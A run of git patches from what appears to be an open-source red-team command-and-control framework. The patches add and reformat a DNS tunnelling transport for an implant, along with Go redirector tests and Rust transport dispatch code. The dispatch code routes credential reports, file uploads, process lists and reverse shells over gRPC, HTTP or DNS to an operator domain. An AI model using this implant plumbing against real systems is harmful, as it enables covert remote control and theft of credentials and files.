assert.NotEmpty(t, statusPacket.Acks) + // NACKs will appear after gaps - not on first chunk + } + + // Verify chunks stored + val, ok := r.conversations.Load("gaps1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 3) + assert.Equal(t, []byte{1}, conv.Chunks[1]) + assert.Equal(t, []byte{3}, conv.Chunks[3]) + assert.Equal(t, []byte{5}, conv.Chunks[5]) + assert.False(t, conv.Completed) // Not all chunks received + }) + + t.Run("unknown conversation", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "unknown", + Sequence: 1, + Data: []byte{0x01}, + } + + _, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("sequence out of bounds", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 3, + DataCrc32: 0, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "bounds1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunk with sequence > TotalChunks + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "bounds1234", + Sequence: 10, + Data: []byte{0x01}, + } + + _, err = r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "sequence out of bounds") + }) } -// TestCRCMismatch tests CRC validation failure -func TestCRCMismatch(t *testing.T) { - r := newTestRedirector() +// TestProcessCompletedConversation tests data reassembly and CRC validation +func TestProcessCompletedConversation(t *testing.T) { + t.Run("successful reassembly and CRC validation", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03, 0x04, 0x05} + expectedCRC := crc32.ChecksumIEEE(data) + + conv := &Conversation{ + ID: "complete1234", + MethodPath: "/test/method", + TotalChunks: 3, + ExpectedCRC: expectedCRC, + ExpectedDataSize: uint32(len(data)), + Chunks: map[uint32][]byte{ + 1: {0x01, 0x02}, + 2: {0x03, 0x04}, + 3: {0x05}, + }, + } - // Create conversation with wrong CRC - methodCode := "ct" - totalChunksStr := "00001" - wrongCRC := dnsredirector.EncodeBase36CRC(12345) // Wrong CRC - initPayload := methodCode + totalChunksStr + wrongCRC + // Mock upstream that returns empty response + // Since we can't easily mock grpc.ClientConn, we'll test the reassembly logic + // by directly checking the data assembly - convID, err := r.HandleInitPacket("temp", initPayload) - require.NoError(t, err) + // Manually reassemble to test logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + require.True(t, ok, "missing chunk %d", i) + fullData = append(fullData, chunk...) + } - convIDStr := string(convID) + assert.Equal(t, data, fullData) + actualCRC := crc32.ChecksumIEEE(fullData) + assert.Equal(t, expectedCRC, actualCRC) + assert.Equal(t, conv.ExpectedDataSize, uint32(len(fullData))) + }) - // Send data with different content - actualData := []byte{0xFF, 0xFF, 0xFF, 0xFF} - _, err = r.HandleDataPacket(convIDStr, 0, actualData) - require.NoError(t, err) + t.Run("CRC mismatch detection", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03} + wrongCRC := uint32(0xDEADBEEF) + + conv := &Conversation{ + ID: "crcfail1234", + MethodPath: "/test/method", + TotalChunks: 1, + ExpectedCRC: wrongCRC, + Chunks: map[uint32][]byte{ + 1: data, + }, + } - // Note: CRC validation now happens automatically when all chunks received + // Test CRC validation logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + fullData = append(fullData, conv.Chunks[i]...) + } + + actualCRC := crc32.ChecksumIEEE(fullData) + assert.NotEqual(t, wrongCRC, actualCRC, "CRC should mismatch") + }) } From 54e8e0d200e8f870fffbc492cb46a3905e9a2c3c Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:37:41 -0600 Subject: [PATCH 10/17] fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt --- implants/lib/transport/src/dns.rs | 82 +++++++++++++++++++++---------- 1 file changed, 56 insertions(+), 26 deletions(-) diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 32ee0ee0e..20c29adfd 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -519,7 +519,10 @@ impl DNS { chunks: &[Vec], conv_id: &str, total_chunks: usize, - ) -> Result<(std::collections::HashSet, std::collections::HashSet)> { + ) -> Result<( + std::collections::HashSet, + std::collections::HashSet, + )> { use std::collections::HashSet; let mut acknowledged = HashSet::new(); @@ -669,8 +672,11 @@ impl DNS { match self.send_packet(retransmit_packet).await { Ok(response_data) => { - let (acks, nacks) = - Self::process_chunk_response(&response_data, nack_seq, total_chunks)?; + let (acks, nacks) = Self::process_chunk_response( + &response_data, + nack_seq, + total_chunks, + )?; // Process ACKs for ack_seq in acks { @@ -698,11 +704,7 @@ impl DNS { } /// Fetch response from server, handling potentially chunked responses - async fn fetch_response( - &mut self, - conv_id: &str, - total_chunks: usize, - ) -> Result> { + async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result> { log::debug!( "DNS: All {} chunks acknowledged, sending FETCH", total_chunks @@ -736,7 +738,9 @@ impl DNS { // Check if response is chunked if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { if metadata.total_chunks > 0 { - return self.fetch_chunked_response(conv_id, total_chunks, &metadata).await; + return self + .fetch_chunked_response(conv_id, total_chunks, &metadata) + .await; } } @@ -794,14 +798,21 @@ impl DNS { method_code: &str, ) -> Result> { // Validate and prepare chunks - let (chunk_size, total_chunks, data_crc) = self.validate_and_prepare_chunks(&request_data)?; + let (chunk_size, total_chunks, data_crc) = + self.validate_and_prepare_chunks(&request_data)?; // Generate conversation ID let conv_id = Self::generate_conv_id(); // Send INIT packet - self.send_init_packet(&conv_id, method_code, total_chunks, request_data.len(), data_crc) - .await?; + self.send_init_packet( + &conv_id, + method_code, + total_chunks, + request_data.len(), + data_crc, + ) + .await?; // Prepare chunks let chunks: Vec> = request_data @@ -1150,8 +1161,8 @@ mod tests { #[test] fn test_new_single_server() { - let dns = - DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + let dns = DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); assert_eq!(dns.base_domain, "dnsc2.realm.pub"); assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); @@ -1174,8 +1185,11 @@ mod tests { #[test] fn test_new_record_type_a() { - let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), None) - .expect("should parse"); + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), + None, + ) + .expect("should parse"); assert_eq!(dns.record_type, DnsRecordType::A); } @@ -1198,14 +1212,16 @@ mod tests { #[test] fn test_new_wildcard_uses_fallbacks() { - let dns = DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + let dns = + DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); // Should have fallback servers assert!(!dns.dns_servers.is_empty()); // Fallback servers include known DNS resolvers - let has_fallback = dns.dns_servers.iter().any(|s| { - s.contains("1.1.1.1") || s.contains("8.8.8.8") - }); + let has_fallback = dns + .dns_servers + .iter() + .any(|s| s.contains("1.1.1.1") || s.contains("8.8.8.8")); assert!(has_fallback, "Should have fallback DNS servers"); } @@ -1213,12 +1229,16 @@ mod tests { fn test_new_missing_domain() { let result = DNS::new("dns://8.8.8.8:53".to_string(), None); assert!(result.is_err()); - assert!(result.unwrap_err().to_string().contains("domain parameter is required")); + assert!(result + .unwrap_err() + .to_string() + .contains("domain parameter is required")); } #[test] fn test_new_without_scheme() { - let dns = DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + let dns = + DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); assert_eq!(dns.base_domain, "dnsc2.realm.pub"); } @@ -1256,7 +1276,11 @@ mod tests { // Each label should be <= 63 chars for label in subdomain.split('.') { - assert!(label.len() <= MAX_LABEL_LENGTH, "Label too long: {}", label.len()); + assert!( + label.len() <= MAX_LABEL_LENGTH, + "Label too long: {}", + label.len() + ); } } @@ -1285,7 +1309,11 @@ mod tests { // Should have multiple labels (dots) let label_count = subdomain.matches('.').count(); - assert!(label_count > 1, "Expected multiple labels, got {}", label_count); + assert!( + label_count > 1, + "Expected multiple labels, got {}", + label_count + ); } // ============================================================ @@ -1301,7 +1329,9 @@ mod tests { record_type: DnsRecordType::TXT, }; - let (query, txid) = dns.build_dns_query("test.dnsc2.realm.pub").expect("should build"); + let (query, txid) = dns + .build_dns_query("test.dnsc2.realm.pub") + .expect("should build"); // Header should be 12 bytes minimum assert!(query.len() > 12); @@ -1400,7 +1430,7 @@ mod tests { assert!(chunk_size > 0); assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk - // CRC is deterministic - just verify it's calculated + // CRC is deterministic - just verify it's calculated assert_eq!(crc, DNS::calculate_crc32(&[])); } From 8535045632cfc3e07ebe698ebba3359a0b9c28b8 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:56:00 -0600 Subject: [PATCH 11/17] added dns to imixv2 --- implants/imixv2/Cargo.toml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/implants/imixv2/Cargo.toml b/implants/imixv2/Cargo.toml index b531ad720..79ebdd8c9 100644 --- a/implants/imixv2/Cargo.toml +++ b/implants/imixv2/Cargo.toml @@ -7,9 +7,10 @@ edition = "2024" crate-type = ["cdylib"] [features] -default = ["install", "grpc", "http1"] +default = ["install", "grpc", "http1", "dns"] grpc = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] win_service = [] install = [] From d71c17212f31a11619189d8ed5ed5317bd31a468 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 23:38:53 -0600 Subject: [PATCH 12/17] line endings ? --- implants/lib/transport/src/lib.rs | 726 +++++++++++++++--------------- 1 file changed, 363 insertions(+), 363 deletions(-) diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 6b5af2907..44b51ff39 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -1,363 +1,363 @@ -use anyhow::{anyhow, Result}; -use pb::c2::*; -use std::sync::mpsc::{Receiver, Sender}; - -#[cfg(feature = "grpc")] -mod grpc; - -#[cfg(feature = "grpc-doh")] -mod dns_resolver; - -#[cfg(feature = "http1")] -mod http; - -#[cfg(feature = "dns")] -mod dns; - -#[cfg(feature = "mock")] -mod mock; -#[cfg(feature = "mock")] -pub use mock::MockTransport; - -mod transport; -pub use transport::Transport; - -#[derive(Clone)] -pub enum ActiveTransport { - #[cfg(feature = "grpc")] - Grpc(grpc::GRPC), - #[cfg(feature = "http1")] - Http(http::HTTP), - #[cfg(feature = "dns")] - Dns(dns::DNS), - #[cfg(feature = "mock")] - Mock(mock::MockTransport), - Empty, -} - -impl Transport for ActiveTransport { - fn init() -> Self { - Self::Empty - } - - fn new(uri: String, proxy_uri: Option) -> Result { - match uri { - // 1. gRPC: Passthrough - s if s.starts_with("http://") || s.starts_with("https://") => { - #[cfg(feature = "grpc")] - return Ok(ActiveTransport::Grpc(grpc::GRPC::new(s, proxy_uri)?)); - #[cfg(not(feature = "grpc"))] - return Err(anyhow!("gRPC transport not enabled")); - } - - // 2. gRPC: Rewrite (Order: longest match 'grpcs' first) - s if s.starts_with("grpc://") || s.starts_with("grpcs://") => { - #[cfg(feature = "grpc")] - { - let new = s - .replacen("grpcs://", "https://", 1) - .replacen("grpc://", "http://", 1); - Ok(ActiveTransport::Grpc(grpc::GRPC::new(new, proxy_uri)?)) - } - #[cfg(not(feature = "grpc"))] - return Err(anyhow!("gRPC transport not enabled")); - } - - // 3. HTTP1: Rewrite - s if s.starts_with("http1://") || s.starts_with("https1://") => { - #[cfg(feature = "http1")] - { - let new = s - .replacen("https1://", "https://", 1) - .replacen("http1://", "http://", 1); - Ok(ActiveTransport::Http(http::HTTP::new(new, proxy_uri)?)) - } - #[cfg(not(feature = "http1"))] - return Err(anyhow!("http1 transport not enabled")); - } - - // 4. DNS - s if s.starts_with("dns://") => { - #[cfg(feature = "dns")] - { - Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) - } - #[cfg(not(feature = "dns"))] - return Err(anyhow!("DNS transport not enabled")); - } - - _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), - } - } - - async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.claim_tasks(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.claim_tasks(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.claim_tasks(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.claim_tasks(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn fetch_asset( - &mut self, - request: FetchAssetRequest, - sender: Sender, - ) -> Result<()> { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.fetch_asset(request, sender).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_credential( - &mut self, - request: ReportCredentialRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_credential(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_credential(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_credential(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_credential(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_file( - &mut self, - request: Receiver, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_file(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_file(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_file(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_file(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_process_list( - &mut self, - request: ReportProcessListRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_process_list(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_process_list(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_process_list(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_process_list(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_task_output( - &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_task_output(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_task_output(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_task_output(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_task_output(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn reverse_shell( - &mut self, - rx: tokio::sync::mpsc::Receiver, - tx: tokio::sync::mpsc::Sender, - ) -> Result<()> { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.reverse_shell(rx, tx).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - fn get_type(&mut self) -> beacon::Transport { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.get_type(), - #[cfg(feature = "http1")] - Self::Http(t) => t.get_type(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.get_type(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.get_type(), - Self::Empty => beacon::Transport::Unspecified, - } - } - - fn is_active(&self) -> bool { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.is_active(), - #[cfg(feature = "http1")] - Self::Http(t) => t.is_active(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.is_active(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.is_active(), - Self::Empty => false, - } - } - - fn name(&self) -> &'static str { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.name(), - #[cfg(feature = "http1")] - Self::Http(t) => t.name(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.name(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.name(), - Self::Empty => "none", - } - } - - #[allow(clippy::vec_init_then_push)] - fn list_available(&self) -> Vec { - let mut list = Vec::new(); - #[cfg(feature = "grpc")] - list.push("grpc".to_string()); - #[cfg(feature = "http1")] - list.push("http".to_string()); - #[cfg(feature = "dns")] - list.push("dns".to_string()); - #[cfg(feature = "mock")] - list.push("mock".to_string()); - list - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[tokio::test] - #[cfg(feature = "grpc")] - async fn test_routes_to_grpc_transport() { - // All these prefixes should result in the Grpc variant - let inputs = vec![ - // Passthrough cases - "http://127.0.0.1:50051", - "https://127.0.0.1:50051", - // Rewrite cases - "grpc://127.0.0.1:50051", - "grpcs://127.0.0.1:50051", - ]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - - // 1. Assert strictly on the Variant type - assert!( - matches!(result, Ok(ActiveTransport::Grpc(_))), - "URI '{}' did not resolve to ActiveTransport::Grpc", - uri - ); - } - } - - #[tokio::test] - #[cfg(not(feature = "http1"))] - async fn test_routes_to_http1_transport() { - // All these prefixes should result in the Http1 variant - let inputs = vec!["http1://127.0.0.1:8080", "https1://127.0.0.1:8080"]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - - assert!( - matches!(result, Ok(ActiveTransport::Http(_))), - "URI '{}' did not resolve to ActiveTransport::Http", - uri - ); - } - } - - #[tokio::test] - #[cfg(feature = "dns")] - async fn test_routes_to_dns_transport() { - // DNS URIs should result in the Dns variant - let inputs = vec![ - "dns://8.8.8.8:53?domain=example.com", - "dns://*?domain=example.com&type=txt", - "dns://1.1.1.1?domain=test.com&type=a", - ]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - - assert!( - matches!(result, Ok(ActiveTransport::Dns(_))), - "URI '{}' did not resolve to ActiveTransport::Dns", - uri - ); - } - } - - #[tokio::test] - #[cfg(not(feature = "grpc"))] - async fn test_grpc_disabled_error() { - // If the feature is off, these should error out - let inputs = vec!["grpc://foo", "grpcs://foo", "http://foo"]; - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - assert!( - result.is_err(), - "Expected error for '{}' when gRPC feature is disabled", - uri - ); - } - } - - #[tokio::test] - async fn test_unknown_transport_errors() { - let inputs = vec!["ftp://example.com", "ws://example.com", "random-string", ""]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - assert!( - result.is_err(), - "Expected error for unknown URI scheme: '{}'", - uri - ); - } - } -} +use anyhow::{anyhow, Result}; +use pb::c2::*; +use std::sync::mpsc::{Receiver, Sender}; + +#[cfg(feature = "grpc")] +mod grpc; + +#[cfg(feature = "grpc-doh")] +mod dns_resolver; + +#[cfg(feature = "http1")] +mod http; + +#[cfg(feature = "dns")] +mod dns; + +#[cfg(feature = "mock")] +mod mock; +#[cfg(feature = "mock")] +pub use mock::MockTransport; + +mod transport; +pub use transport::Transport; + +#[derive(Clone)] +pub enum ActiveTransport { + #[cfg(feature = "grpc")] + Grpc(grpc::GRPC), + #[cfg(feature = "http1")] + Http(http::HTTP), + #[cfg(feature = "dns")] + Dns(dns::DNS), + #[cfg(feature = "mock")] + Mock(mock::MockTransport), + Empty, +} + +impl Transport for ActiveTransport { + fn init() -> Self { + Self::Empty + } + + fn new(uri: String, proxy_uri: Option) -> Result { + match uri { + // 1. gRPC: Passthrough + s if s.starts_with("http://") || s.starts_with("https://") => { + #[cfg(feature = "grpc")] + return Ok(ActiveTransport::Grpc(grpc::GRPC::new(s, proxy_uri)?)); + #[cfg(not(feature = "grpc"))] + return Err(anyhow!("gRPC transport not enabled")); + } + + // 2. gRPC: Rewrite (Order: longest match 'grpcs' first) + s if s.starts_with("grpc://") || s.starts_with("grpcs://") => { + #[cfg(feature = "grpc")] + { + let new = s + .replacen("grpcs://", "https://", 1) + .replacen("grpc://", "http://", 1); + Ok(ActiveTransport::Grpc(grpc::GRPC::new(new, proxy_uri)?)) + } + #[cfg(not(feature = "grpc"))] + return Err(anyhow!("gRPC transport not enabled")); + } + + // 3. HTTP1: Rewrite + s if s.starts_with("http1://") || s.starts_with("https1://") => { + #[cfg(feature = "http1")] + { + let new = s + .replacen("https1://", "https://", 1) + .replacen("http1://", "http://", 1); + Ok(ActiveTransport::Http(http::HTTP::new(new, proxy_uri)?)) + } + #[cfg(not(feature = "http1"))] + return Err(anyhow!("http1 transport not enabled")); + } + + // 4. DNS + s if s.starts_with("dns://") => { + #[cfg(feature = "dns")] + { + Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) + } + #[cfg(not(feature = "dns"))] + return Err(anyhow!("DNS transport not enabled")); + } + + _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), + } + } + + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.claim_tasks(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.claim_tasks(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.claim_tasks(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.claim_tasks(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + sender: Sender, + ) -> Result<()> { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.fetch_asset(request, sender).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_credential(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_credential(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_credential(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_credential(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_file( + &mut self, + request: Receiver, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_file(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_file(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_file(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_file(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_process_list(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_process_list(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_process_list(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_process_list(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_task_output(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_task_output(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_task_output(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_task_output(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn reverse_shell( + &mut self, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.reverse_shell(rx, tx).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + fn get_type(&mut self) -> beacon::Transport { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.get_type(), + #[cfg(feature = "http1")] + Self::Http(t) => t.get_type(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.get_type(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.get_type(), + Self::Empty => beacon::Transport::Unspecified, + } + } + + fn is_active(&self) -> bool { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.is_active(), + #[cfg(feature = "http1")] + Self::Http(t) => t.is_active(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.is_active(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.is_active(), + Self::Empty => false, + } + } + + fn name(&self) -> &'static str { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.name(), + #[cfg(feature = "http1")] + Self::Http(t) => t.name(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.name(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.name(), + Self::Empty => "none", + } + } + + #[allow(clippy::vec_init_then_push)] + fn list_available(&self) -> Vec { + let mut list = Vec::new(); + #[cfg(feature = "grpc")] + list.push("grpc".to_string()); + #[cfg(feature = "http1")] + list.push("http".to_string()); + #[cfg(feature = "dns")] + list.push("dns".to_string()); + #[cfg(feature = "mock")] + list.push("mock".to_string()); + list + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[tokio::test] + #[cfg(feature = "grpc")] + async fn test_routes_to_grpc_transport() { + // All these prefixes should result in the Grpc variant + let inputs = vec![ + // Passthrough cases + "http://127.0.0.1:50051", + "https://127.0.0.1:50051", + // Rewrite cases + "grpc://127.0.0.1:50051", + "grpcs://127.0.0.1:50051", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + // 1. Assert strictly on the Variant type + assert!( + matches!(result, Ok(ActiveTransport::Grpc(_))), + "URI '{}' did not resolve to ActiveTransport::Grpc", + uri + ); + } + } + + #[tokio::test] + #[cfg(not(feature = "http1"))] + async fn test_routes_to_http1_transport() { + // All these prefixes should result in the Http1 variant + let inputs = vec!["http1://127.0.0.1:8080", "https1://127.0.0.1:8080"]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Http(_))), + "URI '{}' did not resolve to ActiveTransport::Http", + uri + ); + } + } + + #[tokio::test] + #[cfg(feature = "dns")] + async fn test_routes_to_dns_transport() { + // DNS URIs should result in the Dns variant + let inputs = vec![ + "dns://8.8.8.8:53?domain=example.com", + "dns://*?domain=example.com&type=txt", + "dns://1.1.1.1?domain=test.com&type=a", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Dns(_))), + "URI '{}' did not resolve to ActiveTransport::Dns", + uri + ); + } + } + + #[tokio::test] + #[cfg(not(feature = "grpc"))] + async fn test_grpc_disabled_error() { + // If the feature is off, these should error out + let inputs = vec!["grpc://foo", "grpcs://foo", "http://foo"]; + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + assert!( + result.is_err(), + "Expected error for '{}' when gRPC feature is disabled", + uri + ); + } + } + + #[tokio::test] + async fn test_unknown_transport_errors() { + let inputs = vec!["ftp://example.com", "ws://example.com", "random-string", ""]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + assert!( + result.is_err(), + "Expected error for unknown URI scheme: '{}'", + uri + ); + } + } +} From d0301aa810e9039fbd7738513548e373bc946e11 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 23:41:20 -0600 Subject: [PATCH 13/17] more line endings --- implants/lib/transport/Cargo.toml | 74 +++++++++++++++---------------- 1 file changed, 37 insertions(+), 37 deletions(-) diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index bb225e2b0..bedf5abfb 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -1,37 +1,37 @@ -[package] -name = "transport" -version = "0.0.5" -edition = "2021" 